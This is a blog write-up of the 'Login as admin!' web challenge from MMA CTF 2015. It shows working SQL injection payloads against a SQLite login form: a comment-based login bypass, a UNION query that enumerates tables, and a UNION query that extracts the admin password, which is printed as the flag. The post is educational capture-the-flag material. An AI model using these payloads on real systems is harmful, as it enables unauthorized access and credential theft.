shpik's world!

[Web] Login as admin! - 30pts

0x400 CTF/0x401 MMA 1st 2015


Problem

Login as admin. And get the flag! The flag is the password of admin.

http://arrive.chal.mmactf.link/login.cgi

You can use test:test.

Flag

#Your ScoreScoreTeams
13030318


Problem Page [ http://arrive.chal.mmactf.link/login.cgi ]

 
 



This Problem is sql injection,then this is sqlite.


Let's exploit!


First I send query simply


POST DATA : username=admin' --&password=1

Congratulations!!
You are admin user.
The flag is your password!

logout


oh... flag is admin's password.


therefore i find table name.


POST DATA : username=admin' union select name, NULL from sqlite_master--&password=1

You are user user.

logout

Table name is 'user'.


so, i inject username with union command


POST DATA : username=admin' union select password,NULL from user limit 0,1--&password=1


You are MMA{cats_alice_band} user.

logout


Good!

Flag is MMA{cats_alice_band}


Actually this problem is not filtering.

so, you can used blind sql injection.




Author : shpik (http://shpik.tistory.com)

'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08